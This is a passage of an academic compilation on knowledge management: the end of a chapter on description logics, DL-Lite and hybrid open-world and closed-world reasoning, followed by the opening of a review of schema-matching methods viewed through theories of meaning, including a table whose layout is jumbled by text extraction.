the necessity to merge distinct databases into a single one: obviously, you need to preserve data consistency. In order to avoid comparing the different schemata by hand, in order to check whether there are incoherent tables as well as misaligned tuples stored in the tables, it proves useful to exploit the representation provided by semantics-aware KBs, together with the inference services supplied by the underlying logical formalism, and let a description logics system carry out this work. If the response is positive, then the new database is logically consistent, otherwise it becomes necessary to modify the schema. From a computational point of view, DL-Lite6 is a very simple language, as the satisfiability of a KB can be computed in polynomial time. The grammar of DL-Lite is shown in Figure 4, where A, B, C denote concepts and R denotes a role. DL-Lite allows for existential quantification (∃R), inverse roles (∃R−), negation of concepts (¬B), and conjunction of concepts (C1 ∩ C2). DL-Lite also permits to express inclusion assertion, B ⊆ C, e.g., assertion about hierarchy relations among concepts, and functionality assertions, (funct R), (funct R−). The expressiveness of DL-Lite is therefore limited, but it suffices to capture, for example, the semantics of UML class diagrams7 and ER diagrams (Chen, 1976), i.e., DL-Lite has the same modeling capabilities of these two formalisms. From this relation between DL-Lite and ER, it follows that DL-Lite can also capture the semantics of RDBMS, allowing the expression of the data carried by tuples in tables by means of DLs axioms. However, this is not enough to guarantee that the integration between DL-Lite and RDBMS is straightforward. Indeed, typical reasoning
Figure 4. The grammar of DL-Lite B ::= A | ∃R | ∃R− C ::= B | ¬B | C1 ⊆ C2
275
Approaches to Semantics in Knowledge Management
processes are different in the two formalisms: recalling the parallel between TBox and tables and between ABox and tuples, users of RDBMS are typically interested in querying instance data and not the structural properties of tables, that is, they are interested in data complexity. In DLs, querying the data (ABox) is generally more complex than querying the schema, since ABox reasoning also requires to consider, during the reasoning process, the definition of all concepts involved, and not only instance data. Hence, there are more axioms to be considered and reasoning is obviously influenced. Moreover, a basic reasoning task in DLs is query answering, but the typical SQL query posed to a RDBMS is equivalent to what is called conjunctive query answering in DLs, which is a far more complex task than simple query answering, since it amounts to answering to many queries at the same time and then combining the results. There is an interesting implementation of DL-Lite, called QUONTO (Acciarri et al., 2005), which reflects all the features of DL-Lite. QUONTO indeed stores the data into a RDBMS, permitting the storage of large quantities of data and, moreover it allows a user to ask conjunctive queries to the knowledge base by transforming them into SQL queries, allowing the retrieval of results from the underlying RDBMS.
INTEGRATING CWA AND OWA WITH HYBRID REASONING In the previous section, we presented a framework that is capable of integrating the richer palette of constructs provided by DLs with the RDBMS unparalleled performance. The purpose was to enable practical implementations of KBs that retain the open-world semantics of the former and take advantage of the inference techniques that were developed for DLs. Instead, in this section we introduce the issues related with the
276
conjunct evaluation of open- and closed-world data structures, in order to retain the individual semantics. This sort of integration is becoming increasingly important because proprietary data structures, such as those stored by individual business subjects in their KBs, are frequently integrated with external data sources upon which traditional assumptions may no longer hold. Specifically, in many current scenarios it is not correct to consider a given piece of information as “false” only because a positive acknowledgment cannot be retrieved from the local system. In fact, such information may exist in the wider context of an extended enterprise, as the local system may be outdated or misaligned with the external contributions to the KB. In this case, the correct approach is to consider a statement as false only when the information actually stored by the system can rule out such possibility. On the contrary, mainstream data management facilities (e.g., RDBMS) rely on the assumption that everything not explicitly stated in the database can be automatically considered as false. Therefore, now we provide an example of how this difference is significant when applying inference techniques to derive information not explicitly stated in the KB. We then provide an overview of existing approaches to hybrid reasoning. Throughout the chapter, we have highlighted the differences in expressiveness between the relational model, as implemented by RDBMS, and the ontology-based models that can be expressed as DL data structures. However, it should be pointed out that the semantics conveyed by RDBMS, as opposed to that of DLs, may sometimes provide the only correct interpretation on instance data. As an example, if we consider entity Article as the concept definition categorizing only those goods that are produced or distributed by the business subject under consideration (i.e., they are to be considered exhaustively detailed), then the query in (3) (expressed for convenience as natural language) amounts to verifying which
Approaches to Semantics in Knowledge Management
instances of concept Article do not have two or more TargetMarkets associated with them. retrieve articles that are distributed in at most one (3) target market This can be straightforwardly implemented as a SQL query and we can be confident that the query a) will return all the results and b) does not contain false positives. Suppose now that we extend the KB with concept Product in order to express, other than goods produced by the business subject, also those goods that are produced by different business entities (e.g., competitors). This concept will typically be populated with instances by monitoring markets, executing surveys, and in general by collecting data sources that may not be complete or up-to-date. Moreover, members of concept Product can be related with the specific Markets they are distributed in8, but we cannot be sure that a product is not distributed in a given market only because no such evidence can be retrieved from the knowledge base. The reformulation of (3) taking into account the new concept definition is the following: retrieve products that are distributed in at most (4) one market In this case, a SQL query may not retrieve the correct results, for instance false positives may be introduced because the system is not aware of all the markets products are distributed in. Instead, the approach provided by DL reasoners constitutes the correct interpretation of the data model9. The statement (4) can be easily translated into DL structures; specifically, the following DL axiom defines concept Query whose instances are those requested in (4): Query ≡ Product ∩ ≤1 isDistributedIn.Market (5)
of the data structures to be modeled is clarified, it is possible to identify the category of applications that can execute a sound and complete inference on these data structures. Now, suppose that the definition in (6) is added to the knowledge base to express that a TargetMarket where no Product (i.e., goods produced by third parties) is distributed in is to be considered a MonopolyMarket: a monopoly market is a target market where no (6) product is distributed in On the one hand, listing TargetMarkets can be effectively achieved in the closed world by assuming that markets interested by articles are exhaustively described in the knowledge base. On the other hand, determining MonopolyMarkets amounts to determining, in the open world, which TargetMarket is featuring a competitor distributing his products in it. This is the typical situation in which choosing either of the interpretations presented in this chapter may produce unexpected results because it may fail to retrieve the correct answers to a query. Instead, it is necessary to combine both approaches into a hybrid knowledge base that may reflect the distinct semantics of data structures. As the closed-world component to be integrated with DL-based, open-world KBs, the best candidate is constituted by LP (Logic Programming) (Lloyd, 1987), the renown formalism grounding Prolog engines. Since the latter are not the only inference engines implementing this category of logic-based, closed-world reasoning (e.g., another outstanding example is constituted by the Jena framework10), we will generally refer to these applications as rule reasoners. In this section, we survey the main approaches to this kind of integration and the open issues related with them. A rule is constituted by an antecedent (a.k.a., the rule body) containing the conjunctive pattern of atomic conditions that, when evaluating to true in the KB, triggers the insertion in the latter of
So far it seems that, once the correct semantics
277
Approaches to Semantics in Knowledge Management
the data structures contained in the consequent (a.k.a. the rule head): A1 ∧ . . . ∧ An → C
(7)
There is a general correspondence between constructs in rules and DL axioms; for example, implication (→) can be modelled as subsumption (⊆), conjunction (∧) is semantically equivalent to intersection (∩), etc. However, rules allow for more general structures with respect to DLs. As an example, atoms A1 . . . An in (7) can contain n-ary relations, while DL is limited to expressing unary and binary relations. Consequently, a basic requirement for the integration of the two reasoning paradigms is a common language for interleaving DL-based class (concept) and property (role) definitions with general-purpose inference rules. The SWRL (Semantic Web Rule Language) (swrl, 2004) is the de-facto standard for embedding rule definitions into ontologies; more specifically, SWRL defines the structural components of rules (atoms, variables, etc.) as OWL classes and properties, so that rules can be introduced into ontologies by instantiating these entities. Configuring a common representation framework can lead us not even half the way through the implementation of a hybrid system; in fact, SWRL at large is generally known to be undecidable. In order to discern which data structures are amenable to actual execution, we have to consider the theoretic aspects behind hybrid reasoning. Beside termination, it is also important to which extent hybrid reasoning can be sound and complete. As a straightforward example of how completeness of inference procedures may be in jeopardy by dividing a knowledge base into separated components, suppose that we further categorize concept Reseller into ShopRetailer and Web-enabledRetailer, as in the following DL axiom: Reseller ≡ ShopRetailer ∪ Web-enabledRetailer
278
(8) Now, suppose that the following discount rates are defined: shop retailers are applied a discount of 15% Web-enabled retailers are applied a discount of 10% The assignments of discount rates in 6 and 7 are then translated into rules and executed by the rule component of the knowledge base: ShopRetailer(x) → hasDiscount(x,′ 15%) (9) Web-enabledRetailer(x) → hasDiscount(x, 10%) (10) It is clear that conjunct evaluation of the two components cannot infer that a generic instance of class Reseller is a valid answer to the query ‘retrieve resellers that has a discount associated with them.’ Specifically, this happens because the multiple models computed by DL reasoners are incompatible with the closed-world inference implemented by rule reasoners. As a consequence, the possibilities examined by DL reasoning (that is, a Retailer being either a ShopRetailer or a Web-enabledRetailer) will not trigger any of the rules (9) and (10). With regard to the separation between openand closed-world components of a knowledge base, the background is multi-faceted because, as we have seen, combining decidable instances of both paradigms do not necessarily result into a decidable, sound, and complete system. A typical example of non-termination is constituted by cyclic definitions that may sometimes be the most intuitive way of expressing a concept, such as in the definition Person ≡ ∃ hasParent.Person. Rule systems cannot wind the infinite chain that this simple definition can produce the way DL
Approaches to Semantics in Knowledge Management
reasoners do. However, for the interesting properties acyclic terminologies are sharing with regard to complexity, cyclic definitions are typically ruled out in practical applications. Moreover, the example above shows that completeness of deductions cannot be granted unless particular care is taken in the interchange between structures from these distinct worlds, that is, the entities that are shared between the ontology and the rule base. Particularly, the interchange between the weaker form of negation-as-failure that is typically implemented by rule systems and the strong negation of DL systems may prevent inference from being complete (Damásio et al., 2005). Consequently, the state of the art is proposing competing views on how to implement hybrid systems. A first approach is constituted by bounding the expressiveness of the structural (i.e., DL-based) component to avoid “dangerous” constructs: AL-log (Donini et al., 1998) is an early example of hybrid system and integrates ALC knowledge bases with a relational component constituted by Datalog rules11; instead, the KAON2 framework (Motik et al., 2005) allows to cast the SHIQ fragment of a OWL DL KB into Description Logic Programs (Grosof et al., 2003), that can be executed by LP systems. Another approach is constituted by restricting the interaction of the structural and relational components, rather than the expressiveness of either. DL-safe rule bases (Motik et al., 2005) can be integrated with full SHOIN (D) but require variables to occur in a non-DL atom in the rule body. Specifically, non-DL literals of the form O(x) are added for each variable x in the rule body and a fact O(a) is added to the non-DL component of the knowledge base for each individual a. The most evident consequence of this is that rules only apply to existing individuals, a limitation that clearly does not exist in DL reasoners. Ontology editors can sometimes provide facilities for integrating the different aspects discussed so far: Protégé (Knublauch, Fergerson, Noy, & Musen, 2004) is featuring a plugin to edit SWRL rules and it is
possible to alternatively process the knowledge base with either a DL reasoner or the Jess inference engine.12 The Swoop editor13 has an experimental development branch that allows for evaluating SWRL rules embedded in ontologies by means of SWI-Prolog. Finally, Hoolet14 is a prototypical implementation of OWL-DL reasoner that uses the very efficient Vampire first order prover15 for processing SWRL rules.
REFERENCES Abiteboul, S., Hull, R., & Vianu, V. (1995). Foundations of Databases. Addison-Wesley. Acciarri, A., Calvanese, D., De Giacomo, G., Lembo, D., Lenzerini, M., Palmieri, M., et al., (2005). Quonto: Querying ontologies. In Proceedings of the 20th National Conference on Artificial Intelligence (aaai 2005) (pp. 1670-1671). Arbib, M. A., & Hanson, A. R. (Eds.). (1987). Vision, brain, and cooperative computation. Cambridge, MA, USA: MIT Press. Baader, F., Calvanese, D., McGuinness, D., Nardi, D., & Patel-Schneider, P. F. (Eds.). (2003). Description logic handbook: Theory, implementation and applications. Cambridge University Press. Balkenius, C. (1993). Some properties of neural representations. In M. Bodn & L. Niklasson, (Eds.), Selected readings of the Swedish conference on connectionism. Balkenius, C., & Gärdenfors, P. (1991). Nonmonotonic inferences in neural networks. In Kr (pp. 32-39). Boley, H., Dean, M., Grosof, B., Horrocks, I., Patel-Schneider, P. F., & Tabet, S. (2004). SWRL: A Semantic Web rule language combining OWL and RuleML. Calvanese, D., De Giacomo, G., Lembo, D., Len-
279
Approaches to Semantics in Knowledge Management
zerini, M., & Rosati, R. (2005). Tailoring OWL for data intensive ontologies. In Proceedings of the Workshop on owl: Experiences and directions (owled 2005).
even more irresistible SROIQ. In Proceedings of the 10th International Conference on Principles of Knowledge Representation and Reasoning (kr 2006) (pp. 57–67). AAAI Press.
Chen, P. P. (1976). The entity-relationship model-toward a unified view of data. ACM Trans. Database Syst., 1(1), pp.9-36.
Kelly, J. J. (1997). The essence of logic. Upper Saddle River, NJ, USA: Prentice-Hall, Inc.
Codd, E. F. (1990). The relational model for database management: version 2. Boston, MA, USA: Addison-Wesley Longman Publishing Co., Inc. Damásio, C. V., Analytu, A., Antoniou, G., & Wagner, G. (2005, September 11-16). Supporting open and closed world reasoning on the Web. In Proceedings of the Principles and Practice of Semantic Web Reasoning, 3rd International Workshop, ppswr 2005, Dagstuhl castle, Germany. (Vol. 4187). Springer. De Giacomo, G., Lenzerini, M., Poggi, A., & Rosati, R. (2006). On the update of description logic ontologies at the Instance Level. In Aaai 2006. Donini, F. M., Lenzerini, M., Nardi, D., & Schaerf, A. (1998). AL-log: Integrating datalog and description logics. J. of Intelligent Information Systems, 10(3), 227-252. Frege, G. (1918). Der Gedanke: Eine logische Untersuchung. Beiträge zur Philosophie des Deutschen Idealismus, I, pp.58-77. Grosof, B. N., Horrocks, I., Volz, R., & Decker, S. (2003). Description logic programs: Combining logic programs with description logic. In Proceedings of the 12th International. World Wide Web Conference (www 2003) (pp. 48–57). ACM. Haase, P., & Stojanovic, L. (2005). Consistent evolution of OWL ontologies. In ESWC (pp. 182-197). Healy, M. J., & Caudell, T. P.(2006). Ontologies and worlds in category theory: Implications for neural systems. Axiomathes, 16(1-2), 165-214. Horrocks, I., Kutz, O., & Sattler, U. (2006). The
280
Knublauch, H., Fergerson, R. W., Noy, N. F., & Musen, M. A.(2004). The protégé owl plugin: An open development environment for Semantic Web applications. In International Semantic Web Conference (pp. 229-243). Kohonen, T. (2000). Self-organizing maps. Springer. Kurfess, F. J. (1999). Neural networks and structured knowledge: Knowledge representation and reasoning. Applied intelligence, 11(1), 5-13. Liu, H., Lutz, C., Milicic, M., & Wolter, F. (2006). Updating Description Logic ABoxes. In Kr (pp. 46-56). Lloyd, J. W. (1987). Foundations of logic programming; (2nd extended ed.). New York, NY, USA: Springer-Verlag New York, Inc. Minsky, M. (1986). The society of mind. New York, NY, USA: Simon & Schuster, Inc. Montague, R. (1974). Formal philosophy: Selected papers of Richard Montague. New Haven, Connecticut: Yale University Press. (Edited, with an introduction, by Richmond H. Thomason) Motik, B., Sattler, U., & Studer, R. (2005). Query answering for OWL-DL with rules. Journal of Web Semantics, 3(1), pp.41-60. Piaget, J. (1952). The origins of intelligence in children. New York, NY: Norton. Piaget, J., & Inhelder, B.(1973). Memory and intelligence. Basic Books. Rumelhart, D. E., & McClelland, J. L. (1986).
Approaches to Semantics in Knowledge Management
Parallel distributed processing. Cambridge, MA, USA: MIT Press. Russell, B.(1908). Mathematical logic as based on the theory of types. American Journal of Mathematics, 30, 222-262. Schank, R. C., & Abelson, R. P. (1977). Scripts, plans, goals and understanding: an inquiry into human knowledge structures. Hillsdale, NJ: L. Erlbaum.
4
5 6
7 8
Smolensky, P. (1993). On the proper treatment of connectionism. In Readings in philosophy and cognitive science (pp.769–799). Cambridge, MA, USA: MIT Press. Wynne-Jones, M. (1991). Constructive algorithms and pruning: Improving the multi layer perceptron. In Vichnevetsky, R. & Miller, J.J. (Ed.), 13th imacs world congress on computation and applied mathematics, (Vol. 2, pp. 747-750).
9
10 11
ENDNOTES 12 1
2
3
Knowledge can also be stored in distributed physical sources, that can be considered as a single logical one from the user’s point of view. However, we will not cover these aspects here. Note that attributes are written lowercase and fillers are capitalised. Defined concept is written in boldface for
13 14 15
the sake of readability. Note that, since (A B) ≡ ¬(A B), a DL supporting negation and conjunction also supports disjunction. http://webont.org/owl/1.1/index.html We denote henceforth with DL-Lite the simplest language of the family, although our consideration is valid for other DL-Lite variants. http://www.omg.org/uml/ Note that Market is defined as a superclass of TargetMarket, because Products are not necessarily distributed in markets where Articles are distributed in. Note that, we have been using the term ‘interpretation’ in the broader sense of ‘the act of interpreting’ while in the DL jargon inspired by model theory it is intended as a ‘mapping from the language to a world.’ http://jena.sourceforge.net/ Datalog programs do not feature negation and also comply with a safety condition according to which variables in the head of rules must also occur in the body. http://herzberg.ca.sandia.gov/ http://code.google.com/p/swoop/ http://owl.man.ac.uk/hoolet/ http://reliant.teknowledge.com/cgi-bin/ cvsweb.cgi/Vampire/
This work was previously published in Semantic Knowledge Management: An Ontology-Based Framework, edited by A. Zilli, E. Damiani, P. Ceravolo, A. Corallo and G. Elia, pp. 146-171, copyright 2009 by Information Science Reference (an imprint of IGI Global).
281
282
Chapter 1.20
Theories of Meaning in Schema Matching: A Review
Joerg Evermann Memorial University of Newfoundland - St. John's, Canada
ABSTRACT
INTRODUCTION
Schema matching is the identification of database elements with similar meaning as preparation for subsequent database integration. Over the past 20 years, different schema-matching methods have been proposed and have been shown to be successful to various degrees. However, schema matching is an ongoing research area and the problem is not yet considered to be solved. This article reviews existing schema-matching methods from the perspective of theories of meanings drawn from philosophy and psychology. It positions existing methods, raises questions for future research based on these theories, and shows how these theories can form a firm theoretical basis as well as guide future schema-matching research.
Database integration is an increasingly important activity. Information systems development often requires integrating existing systems and their databases. Data warehousing requires the integration of data from multiple transaction-processing systems for decision support. Electronic business between organizations requires the integration of trade partners’ business data for efficient business processes. Interagency information sharing in e-government requires integration of data about citizens (Bajaj & Ram, 2003). Database integration is a process with multiple steps, leading from the identification of the databases to the testing of the integrated system. The central step of the database integration process is
the identification of those elements in the schemata of the databases that match each other. This step is termed schema matching. Schema matching can be applied to different data representations, whether they are relational, object oriented, or XML (extensible markup language) based. Existing work on schema matching has focused primarily on relational databases. Schema matching can be applied on the conceptual level, where schema elements are entity types or attributes and relationship types, or it can be applied on the physical level, where schema elements are tables, fields, and foreign-key relationships. Many different methods for matching database schema elements have been proposed (Batini, Lenzerini, & Navathe, 1986; Rahm & Bernstein, 2001). The partial success of the proposed methods shows that the problem is not yet completely solved. The purpose of a review is to provide a new conceptualization of a field and raise unresolved research issues (Webster & Watson, 2002). Consequently, this research review article has three aims. First, it proposes a new theoretical foundation for schema matching. Second, it uses this theoretical foundation to examine and position existing schema-matching methods. Third, based on this theoretical foundation and the positioning of existing schema-matching methods, it points out possible avenues for future research in schema matching. A solid theoretical basis that informs the research in a discipline is seen as essential to the discipline’s maturation (Weber, 1997, 2003). In this sense, the proposed theoretical foundation for schema matching is similar to the role that ontology plays in the wider discipline of information systems development (Wand & Weber, 1990). Wand and Weber’s ontological foundation provided a framework with which to understand existing IS development research and point out future research directions (Wand & Weber, 2002). We hope this article will make a similar contribution to schema-matching research.
The remainder of the article is structured as follows. The second section proposes a new conceptualization of schema-matching research based on theories of meaning. This conceptualization is followed by an introduction to existing schemamatching methods. Then, the article introduces specific theories of meaning and analyzes their use in schema matching. It also presents research questions raised in connection with individual theories of meaning. Next, we position schemamatching methods into the theoretical foundation and offer suggestions for further empirical studies, before concluding the article.
SCHEMA MATCHING AND MEANING Consider a situation that requires the integration of production management data with marketing data for a decision support system. The marketing database contains information about products and articles, while the production database contains information about parts and components (Figure 1). How does a database integrator decide which of these elements match each other? What criteria does the database integrator apply? We propose that the database integrator makes use of an, often implicitly held, theory of meaning. In the example data model in Figure 1, the schema elements Product and Article are matched if the database integrator decides they have the same meaning. Similarly, the elements ProductID and SerialNum are matched if they have the same meaning to the database integrator. The theory of meaning held by the database integrator determines whether they have the same meaning. Hence, the theories of meaning held by database integrators, or humans in general, are relevant to schema matching. Knowing that database integrators hold a theory of meaning is not yet helpful to the concrete schema-matching problem at hand. How does the database integrator decide whether Product and
Article have the same meaning? Is it because products and articles refer to the same things (e.g., things on the factory floor)? Is it because products and components are in the same kind of relationship as articles and parts? Or is it perhaps because products and articles are described by similar features; that is, the primary keys are both of type character? Is it because the data in the corresponding tables Product and Article are used in similar ways or stem from similar sources? The central problem in schema matching is the following question: What does it mean to say that two schema elements have the same meaning? What theory of meaning does the database integrator hold and apply to the problem at hand? All humans implicitly hold their own theory of meaning that is used to make numerous decisions in daily life. When presented with any two terms, everyone is able to judge whether the terms have the same meaning or not, although such judgments may differ from person to person. Furthermore, many people may not be fully aware of how they make such judgments. This review article argues that the identification and explication of the theories of meaning held by database integrators through means of empirical research is relevant to the field of schema matching and beneficial to the improvement of methods in this field.
284
Schema-matching methods embody the theory of meaning held by their developer. A schemamatching method is perceived as successful by its human users when it matches schema elements according to the same criteria that its human users would apply and to which its human users expect it to conform. Consequently, the method’s success, as perceived by its users, depends on both the users and the developers holding the same, or at least compatible, theories of meaning. Hence, when schema-matching methods are developed, the method developers must identify and take into account the theory of meaning of database integrators as users of the method. Furthermore, without clearly explicating the theory of meaning embodied in the method and the theory of meaning held by the method user, the evaluation of schema-matching methods (e.g., Lerner, 2000; Yeh, Porter, & Barker, 2003) by their users may be comparing the proverbial apples and oranges: The method’s theory of meaning and the user’s theory of meaning may be different. Consequently, it would not be surprising if the results produced by the method did not meet the user’s expectation. Unless the theory of meaning embodied in a schema-matching method is shown to match that of the method’s user, any perceived integration success in a particular situation may
Theories of Meaning in Schema Matching
be specific to a particular context and may not be a representative indicator of the capabilities of the method. Hence, identifying the theory of meaning held by a schema-matching method’s users is important in evaluating the method’s performance. Finally, the results of an empirical evaluation of a schema-matching method can give little guidance to its improvement without an explicit theoretical basis. For example, when the precision of a schema-matching method is judged poor, this result by itself gives little indication as to which direction improvements might be sought. Only in connection with a comparison of the theories of meaning held by a method’s developer and its users can empirical results point to ways of improving the schema-matching method. In summary, this section argues for the importance of theories of meaning for the development, evaluation, and improvement of schema-matching methods. Therefore, this review will make three contributions, in line with the three aims of this article as laid out previously. First, the introduction of theories of meaning from reference disciplines to the field of schema matching allows the use of these theories in future schema-matching research. Second, these theories are used as a framework to position and understand existing schema-matching methods. Third, positioning and examining existing schema-matching research within these theories raises research opportunities and new research questions whose answers can guide the future development of schema-matching methods and provide criteria for their design and evaluation. This article does not make recommendations as to which theory of meaning database integrators should adopt in a given situation. Instead, as argued above, the premise is that everyone holds, often implicitly, a theory of meaning. The article argues for the identification, explication, and consideration of theories of meaning that are held by humans in order to benefit research on schema-matching methods. In fact, the identifica-
tion of the theory of meaning held by database integrators is one of the empirical research questions raised in this article.
EXISTING SCHEMA-MATCHING METHODS Schema-matching methods are primarily categorized by their use of schema-level or instance-level information (Batini et al., 1986; Rahm & Bernstein, 2001; T.-W. Wang & Murphy, 2004). Table 1 gives an overview of existing schema-matching methods and their features; the appendix contains further descriptions of each schema-matching method or tool proposed in the literature. The table shows the types of information used for matching: Schema structure and data types are used for schema-level matching, aggregate instance information is used for instance-level matching, and thesauri and lexicographic information can be applied at both levels. Table 1 also distinguishes schema-matching methods by the type of element that is being matched: Some methods are designed to match entities or tables, while others are designed to match attributes or fields. Many schema-matching methods use more than one type of information and are designed to match more than one type of schema element.
Schema-Level Methods Most of the surveyed schema-level methods (Table 1) use linguistic as well as syntactical (constraint) information. Linguistic information is used either by measuring the similarity of schema element names through comparison of character strings (Bertino, Guerrini, & Mesiti, 2004; Gotthard, Lockemann, & Neufeld, 1992; Lerner, 2000; Mitra, Wiederhold, & Kersten, 2000; Palopoli, Sacca, Terracina, & Ursino, 2003), or by using externally supplied lexical databases or dictionaries (Bright, Hurson, & Pakzad, 1994; Castano, De Antonellis, & De Capitani di Vimercati, 2001; Hayne & Ram,
Two terms have the same meaning if they have the same structural relations to other terms.
Clio
Two attributes have the same meaning if their features are identical.
Biskup & Embley (2003)
Two attributes have the same meaning if they are lexicographically similar and possess similar instances.
Bertino et al. (2004)
Two documents have the same meaning if they have the same structure. Two elements in a document have the same meaning if their names are identical.
TESS
Two schema elements have the same meaning if they have the same name and same type.
KBMatch
Two terms have the same meaning if they have the same relations to other objects.
X
X
X
X
X
X
X
X
X
X
X
Semantic network
G
G
Model
Empirical Evaluation
Statistical and Other Learning Techniques
Specificity
Entity Instances
Entities X
X
X
Attributes
Primarily Matching of
Schemata
Data Types and Other Syntactic Info
Lexicographic
Use of Thesaurus (WordNet)
Aggregate Instance Information
Schema Structure
Meaning
Name
Information Used for Matching
X
Relational
G
Object oriented
X
H
Tree
X
G
X
Types (object oriented)
G
X
Semantic network
X
X
continued on following page
286
Theories of Meaning in Schema Matching
Table 1. continued
ARTEMIS
Two attributes have the same meaning if they are synonymous in an external thesaurus and have the same domain.
DIKE
Two terms have the same meaning if they are lexicographically similar, or if their relationships to other terms that are lexicographically similar are of the same type.
X
GLUE
Two terms have the same meaning if their instances cooccur.
X
Autoplex
Two attributes have the same meaning if they have the same distribution of values.
X
Kang & Naughton (2003)
Two attributes have the same meaning if their values determine and are determined by the values of the same set of attributes.
X
iMapper
Two terms have the same meaning if they have the same distribution of assigned documents.
X
X
X
X
X
G
X
H
X
G
X
G
X
Model
Empirical Evaluation
Statistical and Other Learning Techniques
Specificity
Entity Instances
G
X
X
X
Entities
Attributes
Primarily Matching of
Schemata
Data Types and Other Syntactic Info
Lexicographic
Use of Thesaurus (WordNet)
Aggregate Instance Information
Schema Structure
Meaning
Name
Information Used for Matching
Relational
X
Semantic network
Bayes
X
Tree
Bayes
X
Relational
X
Relational
X
Semantic network
Text mining
continued on following page
287
Theories of Meaning in Schema Matching
Table 1. continued
AnchorPROMPT
Two terms have the same meaning if they have the same structural relations to other terms.
WHIRL
Two terms have the same meaning if they have the same distribution throughout all documents.
X
Chua et al. (2003)
Two groups of attributes have the same meaning if their values can be explained by a regression function.
X
SEMINT
Two attributes have the same meaning if they possess the same syntactic specification and the same distribution of values.
X
SimFlood
Two terms have the same meaning if they are lexicographically similar, or if their relationships to other terms that are lexicographically similar are of the same type.
X
ATBE
Two structures have the same meaning if they can be made equivalent by renaming or deletion and addition operations.
X
X
X
X
X
X
X
G
X
G
X
G
X
Text mining
SOM & NN
Model
Empirical Evaluation
Statistical and Other Learning Techniques
H
X
X
Specificity
Entity Instances
Entities
Attributes
Primarily Matching of
Schemata
Data Types and Other Syntactic Info
Lexicographic
Use of Thesaurus (WordNet)
Aggregate Instance Information
Schema Structure
Meaning
Name
Information Used for Matching
X
Semantic network
X
Relational (text)
X
Relational
Relational
G
Semantic network
H
Tree
continued on following page
288
Theories of Meaning in Schema Matching
Table 1. continued
MUVIS
Two terms have the same meaning if they are lexicographically similar, and have similar (lexicographic and syntactic) attributes.
Gotthard et al. (1992)
X
X
X
1990; Melnik, Garcia-Molina, & Rahm, 2002; Noy & Musen, 2001, 2003; Yeh et al., 2003), such as WordNet (Fellbaum, 1998). These databases provide lists of homonyms, synonyms, and other semantic relationships between words. Linguistic information is applicable to problems where schema element names are descriptive, rather than acronyms, or cryptic abbreviations (Kang & Naughton, 2003; Zhao & Ram, 2004). For example, a database schema with tables and attributes with abbreviated names or acronyms such as TAB-BKHY and ATTR-BGHO offers little linguistic information.
Empirical Evaluation
Statistical and Other Learning Techniques
G
Relational
X
X
X
G
Relational
X
X
X
G
Relational
X
X
X
G
Relational
Model
X
Schemata
X
X
X
Specificity
Data Types and Other Syntactic Info
Lexicographic
Use of Thesaurus (WordNet)
Aggregate Instance Information
Entities
Two attributes have the same meaning if their features are identical.
Attributes
Larson et al. (1989)
Schema Structure
Meaning
Name SSM
Two terms have the same meaning if they are lexically identical or appear as synonyms in the thesaurus.
Entity Instances
Primarily Matching of
Information Used for Matching
Matching methods that use linguistic information assume that the meaning encoded in the externally provided dictionary or thesaurus is similar to that held by the method’s users. For example, WordNet (Version 1.7.1) lists the terms product and merchandise as synonymous, while they may in fact be used in different ways and thus have different meanings in the particular integration context (Zhao & Ram, 2004). For example, a company (and its database schema) understands products as the outcome of a development process, sold to business customers and supported by company service teams, whereas
289
Theories of Meaning in Schema Matching
merchandise is understood as things that are sourced externally, sold to consumers, and supported by the supplier. As shown in Table 1, syntactic information, such as data type, optionality, or uniqueness constraints on attributes, is structural information that is extensively used by schema-level matching methods (Bertino et al., 2004; Castano et al., 2001; Gotthard et al., 1992; Hayne & Ram, 1990; Larson, Navathe, & Elmasri, 1989; Lerner, 2000; Mitra et al., 2000; Spaccapietra & Parent, 1994; Zhao & Ram, 2004). These methods assume that syntactic information is related to meaning: The fact that attribute X in schema A is of type integer is assumed to reflect a different meaning than attribute Y in schema B that is of type character. The overall schema structure, that is, the relationships between schema elements, can also be used for schema matching (Bertino et al., 2004; Gotthard et al., 1992; Hayne & Ram, 1990; Melnik et al., 2002; Mitra et al., 2000; Noy & Musen, 2001; Palopoli et al., 2003; T.-L. J. Wang, Zhang, Jeong, & Shasha, 1994; Yeh et al., 2003). The ONION method (Mitra et al.) recognizes the importance of the overall schema structure, and is the exception as the use of structural information is generally limited to local structural relationships, that is, ones that are directly incident on a particular schema element. Another aspect of relevant structural information is the hierarchical nature of some schemata. Table 1 shows a number of methods applicable to hierarchical schemata only. Recent interest in native XML databases and XML document storage allows the exploitation of properties of such hierarchical schemata (Bajaj & Ram, 2003; Bertino et al., 2004; Doan, Domingos, & Halevy, 2001; Noy & Musen, 2001, 2003; Wang et al., 1994).
Instance-Level Methods Information about database instances can be used in addition to, or instead of, schema-level informa-
290
tion. For example, a schema-level matcher may be used to match entity types, and an instance-level matcher may subsequently be used to match attributes (Miller et al., 2001; Berlin & Motro, 2002; Kang & Naughton, 2003; Chua, Chiang, & Lim, 2003; Li, Clifton, & Liu, 2000). Typically, the identification of table columns with similar meaning is based on aggregate instance information, such as value distributions, term frequencies, or averages, that is computed for table columns and used in similarity measures. For example, when two table columns contain the same distribution of values, then the columns are argued to have similar meaning. Machine learning techniques, such as neural networks (Li et al., 2000) or Bayesian learners (Berlin & Motro, 2002; Doan, Madhavan, Dhamankar, Domingos, & Halevy, 2003), and information-retrieval techniques (Su & Gulla, 2006; Su, Hakkarainen, & Brasethvik, 2004) are used to establish characteristic features of an attribute. Instance information for matching is typically used jointly with the matching of schema elements due to the interrelated nature of the two problems. For example, assume that the production database from Figure 1 holds the instance in the table Products (ProductID=32445, Name=WidgetsA, StockLevel=45), while the marketing database holds in the table Articles the instance (SerialNum=89766, Desc=SomeWidget, Amount=45). The two instances cannot be identified as relating to the same physical thing without this being at least partially predicated on an assumed match of schema elements such as Name and Desc, and Article and Product. Instance-level matching methods use information that cannot realistically be used by a human matcher to match schema-level elements such as attributes. The volume of instance data and the number of different aggregate measures to consider make it impossible for unaided humans to take all the information into account. Consequently, instance-based methods alone are unlikely to encapsulate human theories of meaning.
Theories of Meaning in Schema Matching
